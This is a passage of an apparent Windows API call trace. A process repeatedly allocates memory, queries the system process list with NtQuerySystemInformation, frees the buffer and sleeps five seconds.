BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.160] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 